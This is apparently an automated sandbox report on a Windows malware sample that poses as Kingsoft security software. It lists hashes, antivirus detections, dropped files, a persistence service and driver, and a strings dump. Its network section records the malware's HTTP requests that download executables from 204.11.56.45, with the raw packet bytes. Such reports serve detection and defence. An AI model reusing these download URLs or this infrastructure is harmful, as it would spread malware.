Analysis Date: 2015-01-31 09:54:02
MD5: 31066e85f0d5895a80cb16b589311497
SHA1: a7fc303c78e1daf5252ebde33ad142756bcab54e

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 0bc2ffd32265a08d72b795b18265828d sha1: dd2a446014a37556f39173b802c63a4e46e09366 size: 23552
Section.rdata md5: f179218a059068529bdb4637ef5fa28e sha1: 6035d27db526131eb0f29aee60cfcdbb5072ed7d size: 4608
Section.data md5: 975304d6dd6c4a4f076b15511e2bbbc0 sha1: 1f65340672c91ffd0f2583ff104beaece43c7855 size: 1024
Section.ndata md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0 (empty section: these are the MD5/SHA1 digests of zero-length input and carry no information about the sample)
Section.rsrc md5: 7cb59d0370604d227c9de6c967d9b693 sha1: 65f1dc962234785d24f149610e944e545c1b1967 size: 19968
Section.tc<2 md5: 7f019a7b04df881a9c88996a7a94de17 sha1: c87f2b29e7a2f60f19be31a3c9bc1ca3159d96a0 size: 26624
Timestamp: 2009-12-05 22:50:46 (PE header compile time; self-declared and easily altered)
Version info (self-declared PE resource strings; they claim Kingsoft's 金山卫士 product but are attacker-controlled metadata, not evidence of origin):
LegalCopyright: 版权所有(C) 2010 金山卫士
FileVersion: 1.0.0.1001
CompanyName: 金山卫士
LegalTrademarks: 金山卫士
Comments: 金山卫士V10引擎
ProductName: 金山卫士V10引擎
ProductVersion: 1.0.0.1001
FileDescription: 金山卫士V10引擎
PEhash: 7386fcba71e5141f8a3a0e834aa5c5a624999605
IMPhash: 099c0646ea7282d232219f8807883be0
AV360 SafeVirus.Win32.Agent.O
AVAd-AwareWin32.Viking.AR
AVAlwil (avast)Viking-CF:Win32:Viking-CF
AVArcabit (arcavir)Win32.Viking.AR
AVAuthentiumW32/Viking.A.gen!Eldorado
AVAvira (antivir)W32/Fujacks.DR
AVBullGuardWin32.Viking.AR
AVCA (E-Trust Ino)Win32/Viking.D
AVCAT (quickheal)W32.Agent.DP
AVClamAVWorm.Fujack-55
AVDr. WebWin32.HLLW.Autoruner.8224
AVEmsisoftWin32.Viking.AR
AVEset (nod32)Win32/Agent.DP virus
AVFortinetW32/Fujacks.BF!tr
AVFrisk (f-prot)W32/Viking.A.gen!Eldorado
AVF-SecureWin32.Viking.AR
AVGrisoft (avg)Win32/Fujacks.S
AVIkarusTrojan-Downloader.Win32.Jadtre
AVK7Virus ( 00108a531 )
AVKasperskyVirus.Win32.Agent.dp
AVMalwareBytesno_virus
AVMcafeeW32/Fujacks.ay
AVMicrosoft Security EssentialsVirus:Win32/Viking.NK
AVMicroWorld (escan)Win32.Viking.AR
AVRisingWin32.Agent.hn
AVSophosW32/FuzVir-A
AVSymantecW32.Loorp.A!inf
AVTrend MicroPE_JEEFO.D
AVVirusBlokAda (vba32)Virus.Win32.Koklek

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nsw1.tmp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates FileC:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates FilePIPE\SfcApi
Creates FilePIPE\wkssvc
Creates FileC:\WINDOWS\system32\qmgr.dll
Creates FileC:\WINDOWS\system32\mspmsnsv.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts Service WmdmPmSN (presumably the Windows service backed by the mspmsnsv.dll written above; confirm the service's ServiceDll/ImagePath value when triaging)

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 804

Process
↳ Pid 848

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝
2 (SERVICE_AUTO_START: the service is set to start automatically at boot)
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CYLACECT\desktop.ini
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CL63SHUB\desktop.ini
Creates FileNtHid
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates FileC:\Documents and Settings\NetworkService\Cookies\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\85AV4L6V\desktop.ini
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\2NS3SM8E\desktop.ini
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\TEMP\NtHid.sys
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\WINDOWS\TEMP\NtHid.sys
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Mutexc:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!networkservice!cookies!
Creates Mutexc:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates Service NtHid - C:\WINDOWS\TEMP\NtHid.sys (a driver service registered from a temp path; the .sys file is deleted earlier in this process's trace, so the service key is the durable artifact to look for)
Winsock DNS204.11.56.45
Winsock DNSwww.490a-B8B5-9B8C1E870B0C.com
Winsock DNSwww.baidu.com
Winsock DNSpc1.114central.com

Process
↳ Pid 1204

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates FileWMIDataDevice

Process
↳ Pid 1840

Process
↳ Pid 1096

Network Details:

DNSwww.a.shifen.com
Type: A
180.76.3.151
DNSpc1.114central.com
Type: A
204.11.56.45
DNSwww.baidu.com
Type: A
DNSwww.490a-B8B5-9B8C1E870B0C.com
Type: A
DNSnbtj.114anhui.com
Type: A
HTTP GEThttp://204.11.56.45/nbok01/dnfTT.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://204.11.56.45/nbok01/tlTT.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://204.11.56.45/nbok01/RXCQTT.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1033 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1034 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1035 ➝ 204.11.56.45:80

Raw Pcap
0x00000000 (00000)   47455420 2f6e626f 6b30312f 646e6654   GET /nbok01/dnfT
0x00000010 (00016)   542e6578 65204854 54502f31 2e300d0a   T.exe HTTP/1.0..
0x00000020 (00032)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x00000030 (00048)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000040 (00064)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000050 (00080)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000060 (00096)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x00000070 (00112)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x00000080 (00128)   37323729 0d0a486f 73743a20 3230342e   727)..Host: 204.
0x00000090 (00144)   31312e35 362e3435 0d0a436f 6e6e6563   11.56.45..Connec
0x000000a0 (00160)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000b0 (00176)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f6e626f 6b30312f 746c5454   GET /nbok01/tlTT
0x00000010 (00016)   2e657865 20485454 502f312e 300d0a41   .exe HTTP/1.0..A
0x00000020 (00032)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000030 (00048)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000040 (00064)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000050 (00080)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000060 (00096)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000070 (00112)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x00000080 (00128)   3237290d 0a486f73 743a2032 30342e31   27)..Host: 204.1
0x00000090 (00144)   312e3536 2e34350d 0a436f6e 6e656374   1.56.45..Connect
0x000000a0 (00160)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000b0 (00176)   0a0d0a0a                              ....

0x00000000 (00000)   47455420 2f6e626f 6b30312f 52584351   GET /nbok01/RXCQ
0x00000010 (00016)   54542e65 78652048 5454502f 312e300d   TT.exe HTTP/1.0.
0x00000020 (00032)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000050 (00080)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000060 (00096)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x00000070 (00112)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x00000080 (00128)   30373237 290d0a48 6f73743a 20323034   0727)..Host: 204
0x00000090 (00144)   2e31312e 35362e34 350d0a43 6f6e6e65   .11.56.45..Conne
0x000000a0 (00160)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000b0 (00176)   650d0a0d 0a                           e....


Strings
 " "
E
...
......:
000003a8
1.0.0.1001
(C) 2010 
Comments
CompanyName
FILE
FileDescription
FileVersion
LegalCopyright
LegalTrademarks
msctls_progress32
Please wait while Setup is loading...
ProductName
ProductVersion
StringFileInfo
SysListView32
Translation
VarFileInfo
VS_VERSION_INFO
*?|<>/":
08101BB
0h0l0p0t0x0|
1.1E1K1Z1h1
;13B<J<
1=>=F=
:1G1P1]1
?%?2?]?
2(2B2N2W2c2l2x2
2?3H3Q
2D2J2O2U2b1n2t2
>)>2>E>S>\>s
2K2f2v2
2T2d2{2
3$30l3XkG
3=3B3j3p3|3
`;3D;H;L
@3T3e3
4&414]4
4%4+4G4z4
490a-B8B5-9
49-E88E-4c47-98DC
4aaf-A336-C255
4Q5e5x
5$5)56A
5!6&6/6
;!;+;5;?;C;J;P;Z;d;n;x;
:5:F:Y:w:|:
60gnv+
6.6:6C6M6W6\6
#&>6>Cg
71767D7R7^7i7p7
7.{645FF040
7FC663
7@ip:K
?7N7T7]
8-00AA
@.&'85
{-8<8^8
>!>*>8>B>H>V>`>n>t>
8NCRCu
9*:/$:
954E}K
@\96DBA2^
9 9[9`9g9m9s9~9
9&9/9>9Q9e9o9{9
-9;9A9F9
9ao^@q
9.:U&~
A0^0s0
A4J4Y4_4
A67-586
AdjustTokenPrivileges
ADVAPI32
ADVAPI32.dll
AE4C57'
agX \s
a Play
AppendMenuA
appmgmts.dlld
"bd	WVS
BeginPaint
browser
C0M0W0
C1E870B0C
CallWindowProcA
CancelConne
 cannot be run i
CharNextA
CharPrevA
CheckDlgButton
CloseClipboard
CloseHandle
CoCreateInstance
COMCTL32.dll
CompareFileTime
Control Panel\Desktop\ResourceLocale
CopyFileA
Copyro
CoTaskMemFree
<'<CP<Z<|<
CreateBrushIndirect
CreateDialogParamA
CreateDirectoryA
CreateFileA
CreateFontIndirectA
CreatePopupMenu
CreateProcessA
CreateThread
CreateWindowExA
crypt'c
... %d%%
D$0+D$(P
D0H0L0P0T0X0\0`0dw4
DA-6D69-472e-8981-DBC71
@.data
D$(+D$ SSP
default
.DEFAULT\Control Panel\International
DefWindowProcA
DeleteFileA
DeleteObject
DestroyWindow
(D/fc_oL
DialogBoxParamA
DispatchMessageA
DOS mode.
DrawTextA
D$(SPS
dU5 B~
=&=,=D=v=
D@wwwx
E8J8O8[8`8i8o8z8
EmptyClipboard
EnableMenuItem
EnableWindow
EndDialog
EndPaint
ep1'*"/
eParam$
Error launching installer
Error writing temporary file. Make sure your temp folder is valid.
Esht*6
euG	/a@[
ExecuUA
ExitProcess
ExitWindowsEx
ExpandEnvironmentStringsA
Expor.exe
F??3@YAXP
f4)!ba
f+D?	D
FillRect
FindClose
FindFirstFileA
FindNextFileA
FindWindowExA
FO1R8O
FreeLibrary
fY.Req
G| 0+020e0k
GDI32.dll
GetClassInfoA
GetClientRect
GetCommandLineA
GetCurrentProcess
GetDeviceCaps
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetDlgItem
GetDlgItemTextA
GetExitCodeProcess
GetFileAttributesA
GetFileSize
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetFullPathNameA
GetLastError
GetMessagePos
GetModuleFileNameA
GetModuleHandleA
GetPrivateProfileStringA
GetProcAddress
GetShortPathNameA
GetSysColor
GetSystemDirectoryA
GetSystemMenu
GetSystemMetrics
GetTempFileNameA
GetTempPathA
GetTickCount
GetUserDefaultUILanguage
GetVersion
GetWindowLongA
GetWindowRect
GetWindowsDirectoryA
ggB=l^8@Yj
GlobalAlloc
GlobalFree
GlobalLock
GlobalUnlock
h1l1.T
;hDdk h$
HrCg@b	g(
http://nsis.sf.net/NSIS_Error
Hur3'$
ifyTrLo
igVCRT
ImageList_AddMasked
ImageList_Create
ImageList_Destroy
incomplete download and damaged media. Contact the
i	nd4bd
InfGma
ingCompatibil
Installer integrity check has failed. Common causes include
installer's author to obtain a new copy.
Instu_
InvalidateRect
IocSymbgT*
iRichu
IsWindow
IsWindowEnabled
IsWindowVisible
i|tlh`
IXR-!m
j/0@0E0R0f0
 -k 4/
kca:\lsa
KERNEL32
KERNEL32.dll
KERNEL32.DLL
KEveny
K:\Q.pdb`q
krnlHe
l0AolY
L5PFHP7b
LoadBitmapA
LoadCursorA
LoadImageA
LoadLibraryA
LoadLibraryExA
LookupPrivilegeValueA
lp6a J
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpynA
lstrlenA
M:d:m:
MessageBoxIndirectA
\Microsoft\Internet Explorer\Quick Launch
More information at:
MoveFileA
MoveFileExA
MSN Gam
MSVCRT.dll
MulDiv
MultiByteToWideChar
.ndata
NSIS Error
~nsu.tmp
 NT\Curr
NtQu9y
NulluM	E
Nv`mG}
oft\Wud
ole32.dll
OleInitialize
OleUninitialize
o@P3e4
Op-;4$
~OPEN=-
OpenClipboard
OpenProcessToken
+OpsSCM
|otB.8
p:<;9_
PathFileExistsA
PeekMessageA
>P?e?k?
PostQuitMessage
PPPPPP
PsGe])
pVKwOf
PWithTag
q$A3<.
qidu.com
QQQQQQQ
\Ra7207
 `.rdat[
`.rdata
ReadFile
RECYCLER
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyExA
RegDeleteValueA
RegEnumKeyA
RegEnumValueA
RegisterClassA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
Remote
RemoveDirectoryA
[Rename]
RichEd20
RichEd32
RichEdit
RichEdit20A
R+-JJPU&++-JPP
_rju@_fd
-<RoA%'_h7
RtlIoU
S1[1`1m1
{schedsvc
ScreenToClient
SDPSRV
SearchPathA
SelectObject
SendMessageA
SendMessageTimeoutA
SeShutdownPrivilege
SetBkColor
SetBkMode
SetClassLongA
SetClipboardData
SetCurrentDirectoryA
SetCursor
SetDlgItemTextA
SetErrorMode
SetFileAttributesA
SetFilePointer
SetFileTime
SetForegroundWindow
SetTextColor
SetTimer
SetWindowLongA
SetWindowPos
SetWindowTextA
S+.GhXXZZ`hFJ
SHAutoComplete
SHBrowseForFolderA
SHELL32.dll
ShellExecuteA
SHFileOperationA
SHFOLDER
SHGetFileInfoA
SHGetFolderPathA
SHGetPathFromIDListA
SHGetSpecialFolderLocation
SHLWAPI
SHLWAPI.dll
ShowWindow
S++-JKLVED)-JKP
softuV
SOFTWARE\Mi
Software\Microsoft\Windows\CurrentVersion
Sp`FFF
SQSSSPW
sSpec7!:
s_/UYY
swsocknetman1ssdp
SystemParametersInfoA
> _?=t
.tcLCI0
.textVT
_This #g
!This program cannot be run in DOS mode.
T;_;i;z;
tl`TDi
ToFilnH
_^[t	P
TrackPopupMenu
tTisrv
?%_#txg
u49-,?B
>"u:F@
	U;MhOy
uMpr.{
unpacking data: %d%%
#upnphostKn&s
URLDown
USER32.dll
%u.%u%s%s
@;v;{;
V3_3o3x3
V6sion\
v7Os2_qWSArcvF
v95LpA
verifying installer: %d%%
VerQueryValueA
VERSION.dll
#Vh;+@
vieAak:m
VirtualAlloc
VirtualFree
VirtualProtect
vThfad
\v:.X$
W0YX0wx
|w9=trW*
WaitForSingleObject
 winsta0
WmdmPmSN'Fa
Writea7
WriteFile
WritePrivateProfileStringA
wsprintfA
WWk#*A
 X -ibcB"
<)<.<X<i<o
xmlpbS
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
XPTPSW
XPVSSG
XRichS
xV.#"h
XX; tg
.y!GN&
|/Yr3Y
/YW'RB
@z}]u2o